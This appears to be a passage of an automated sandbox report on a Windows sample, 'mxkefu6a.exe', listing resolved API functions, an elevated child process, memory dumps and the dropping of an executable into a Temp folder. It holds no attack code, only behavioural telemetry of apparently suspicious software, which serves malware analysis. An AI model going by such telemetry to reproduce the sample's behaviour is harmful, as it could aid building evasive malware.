| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-22 14:10:13 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 20343813613 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #41: mxkefu6a.exe
177
0
| Information | Value |
|---|---|
| ID | #41 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xce0 |
| Parent PID | 0x1194 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D68
0x
DC0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040608C |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
